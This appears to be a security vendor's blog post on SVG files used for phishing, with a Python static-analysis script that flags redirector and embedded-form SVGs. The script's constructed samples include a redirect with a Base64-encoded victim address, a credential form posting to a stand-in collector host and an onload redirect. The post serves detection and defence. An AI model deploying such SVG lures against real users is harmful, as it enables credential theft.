Introduction
Scalable Vector Graphics (SVG) files are increasingly being abused as initial phishing vectors. At VMRay, our continuous threat monitoring has revealed multiple distinct SVG-powered phishing campaigns.
In this blog, we dissect the underlying tactics, payload delivery mechanisms, and detection strategies to strengthen your defenses.
Why SVG? (The Attack Surface)
SVGs are XML-based graphics capable of embedding JavaScript and HTML via `foreignObject`, `<script>` tags, or Base64-encoded payloads, making them executable content, not just images.
Because many security systems treat SVGs as plain images, they can slip past MIME-type checks and common signature filters, allowing malicious files to be delivered.
SVGs also open in browsers by default, which security systems often disregard, so any embedded script runs with the full capabilities of a web page in the unsuspecting user's environment.
Campaign Variants: SVGs as Attack Vectors
Redirector SVGs
Tactic:
These SVGs embed obfuscated JavaScript that triggers an automatic redirect when the file is opened. The destination is often a credential-harvesting site or a malware payload.
Example Use Case:
An SVG titled Action_Required__INVERCENTERUSA_2025_Compliance_Reminder.svg
is sent as an attachment. When opened in a browser, it silently redirects the user to a spoofed login page.
Targeting & Tracking:
Victim identifiers, such as email addresses, are often base64-encoded within the SVG and appended to the redirect URL. This enables pre-filled phishing forms and tracks individual interactions.
Self-Contained Phishing in SVG
Tactic:
The entire phishing experience—HTML, CSS, and JavaScript—is embedded within the SVG file, sometimes Base64-encoded. It renders locally without needing external resources.
Example Use Case:
An SVG posing as a secure document opens to display a cloned login form rendered within the SVG itself. When users enter credentials, the data is sent directly to the attacker’s server.
Targeting & Tracking:
No external requests are made until form submission, but the victim identifiers also exist in the SVG.
Detection Strategies (How we handle SVGs)
At VMRay, our latest VTI (VMRay Threat Identifier) rules specifically support detecting SVG-powered phishing via multiple techniques. The key here is that VMRay's sandbox environment simulates real-world browser rendering, which enables automatic detection of phishing behavior triggered after SVG interaction, an approach that static filters often miss.
An SVG file that contains only JavaScript to redirect to another website:
The phishing attack here consists of two redirection steps. The SVG file immediately executes its embedded JavaScript once rendered in a browser, followed by an automated redirect to a fake DocuSign page; the landing page then seamlessly forwards the victim to a credential-harvesting logon page.
Figure 1: SVG containing only redirection JavaScript
As seen here, static analysis of the file alone wouldn't reveal much, because the file contains nothing but a redirection.
Since our dynamic web analysis follows redirections, it was able to reveal and analyze the final phishing landing page:
Figure 2: Second stage of phishing
Figure 3: Final stage of phishing (fake logon form)
Because benign SVG files usually contain more than just JavaScript and do not act as simple redirectors, we trigger a VTI rule based on these indicators.
Figure 4: SVG Smuggling VTI triggered
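The indicators discussed above (a Base64-encoded victim identifier appended to the redirect URL in the Redirector section, and a script-only file with nothing to draw in this section) can also be checked statically before a sample ever reaches a sandbox. The following Python triage script is an added example written for this post; it is not VMRay's VTI logic and not code from any of the campaigns. The sample SVGs, the hostnames and the e-mail address in it are constructed for illustration. It parses the SVG as XML, counts drawing elements, collects `<script>` bodies and event-handler attributes, decodes Base64 runs, and assigns a verdict:

```python
import base64
import binascii
import re
import xml.etree.ElementTree as ET

# Elements that draw something; a file carrying <script> but none of these
# has no reason to exist as an "image".
GRAPHIC_TAGS = {"path", "rect", "circle", "ellipse", "line", "polyline",
                "polygon", "text", "image", "use"}
EVENT_ATTRS = {"onload", "onclick", "onmouseover", "onerror", "onbegin", "onend"}
FORM_TAGS = {"form", "input", "button", "iframe"}
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href|\.replace|\.assign)?\s*[=(]"
    r"|window\.open\s*\(", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


def _local(tag):
    """'{http://www.w3.org/2000/svg}script' -> 'script'."""
    return tag.rsplit("}", 1)[-1]


def _decode_blobs(text):
    """Decode base64-looking runs; keep only those yielding an e-mail, URL or markup."""
    out = []
    for m in B64_RE.finditer(text):
        s = m.group(0)
        s += "=" * (-len(s) % 4)          # tolerate stripped padding
        try:
            decoded = base64.b64decode(s, validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue
        if decoded.isprintable() and (EMAIL_RE.search(decoded)
                                      or URL_RE.search(decoded) or "<" in decoded):
            out.append(decoded)
    return out


def analyze_svg(data):
    """Static triage of one SVG file (bytes); returns indicators and a verdict."""
    elems = list(ET.fromstring(data).iter())
    names = [_local(e.tag) for e in elems]
    scripts = [e for e in elems if _local(e.tag) == "script"]
    handlers = sorted({k.lower() for e in elems for k in e.attrib if k.lower() in EVENT_ATTRS})
    # Everything that can run: script bodies plus inline event-handler attributes.
    active = "\n".join([e.text or "" for e in scripts] +
                       [v for e in elems for k, v in e.attrib.items() if k.lower() in EVENT_ATTRS])
    raw = data.decode("utf-8", "ignore")
    decoded = _decode_blobs(raw)
    haystack = "\n".join([raw] + decoded)

    graphic_count = sum(n in GRAPHIC_TAGS for n in names)
    has_foreign = "foreignObject" in names
    has_form = any(n in FORM_TAGS for n in names) or "<form" in haystack.lower()
    redirects = bool(REDIRECT_RE.search("\n".join([active] + decoded)))

    if has_form:
        verdict = "embedded_phishing_form"
    elif redirects and graphic_count == 0:
        verdict = "redirector"            # nothing to draw: the "image" only navigates
    elif scripts or handlers or has_foreign:
        verdict = "suspicious_active_content"
    else:
        verdict = "benign"
    return {
        "verdict": verdict,
        "graphic_elements": graphic_count,
        "script_count": len(scripts),
        "event_handlers": handlers,
        "foreign_object": has_foreign,
        "redirects": redirects,
        "urls": sorted({u for u in URL_RE.findall(haystack)
                        if not u.startswith("http://www.w3.org/")}),
        "identifiers": sorted(set(EMAIL_RE.findall(haystack))),
    }


# Constructed samples for illustration (hostnames and address are invented, not campaign data).
VICTIM_B64 = base64.b64encode(b"alice@example.com").decode()
SAMPLE_REDIRECTOR = f"""<svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
<script><![CDATA[
  window.location.href = "https://login-portal.example/verify?e=" + "{VICTIM_B64}";
]]></script>
</svg>""".encode()

SAMPLE_EMBEDDED_FORM = b"""<svg xmlns="http://www.w3.org/2000/svg" width="600" height="400">
<foreignObject width="600" height="400">
  <form xmlns="http://www.w3.org/1999/xhtml" method="post" action="https://collector.example/post">
    <input name="user" value="alice@example.com"/><input type="password" name="pass"/>
  </form>
</foreignObject>
</svg>"""

SAMPLE_HANDLER = b"""<svg xmlns="http://www.w3.org/2000/svg" onload="top.location='https://collector.example/go'">
<rect width="100" height="100" fill="#ccc"/>
</svg>"""

SAMPLE_BENIGN = b"""<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24">
<circle cx="12" cy="12" r="10" fill="#09f"/>
</svg>"""

if __name__ == "__main__":
    for name, svg in [("redirector", SAMPLE_REDIRECTOR), ("embedded_form", SAMPLE_EMBEDDED_FORM),
                      ("handler", SAMPLE_HANDLER), ("benign", SAMPLE_BENIGN)]:
        print(name, analyze_svg(svg))
```

This is static triage only, and that is exactly its limit: split or obfuscated strings, a `<script>` that fetches its body from an external URL, or a redirect decided at runtime by the browser will not match these regexes, which is why the post pairs indicators like these with actual rendering in a sandbox.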
Figure 5: SVG containing the logon form
Figure 6: SVG file rendering a Microsoft Excel phishing page
Figure 7: SVG Smuggling VTI triggered

Figure 9: Automated human-like browser interaction reveals next stage
Figure 10: SVG Smuggling and Phishing VTIs triggered
SVG-based phishing represents a sophisticated evolution in attacker tradecraft. As we've demonstrated, malicious actors are increasingly leveraging SVG files to embed phishing pages, execute redirections and harvest credentials, all while evading traditional static filters.
VMRay‘s behavioral sandboxing and VTI-based detection strategies are uniquely positioned to uncover the dynamic nature of these threats. By simulating user interactions and parsing embedded behaviors at runtime, we provide defenders with the visibility needed to detect and respond to modern phishing tactics that traditional filters overlook.
As this technique continues to gain traction in phishing kits and malware delivery campaigns, defenders must adapt by incorporating behavioral analysis into their workflows, tightening attachment handling policies, and educating users about the risks posed by seemingly harmless file types.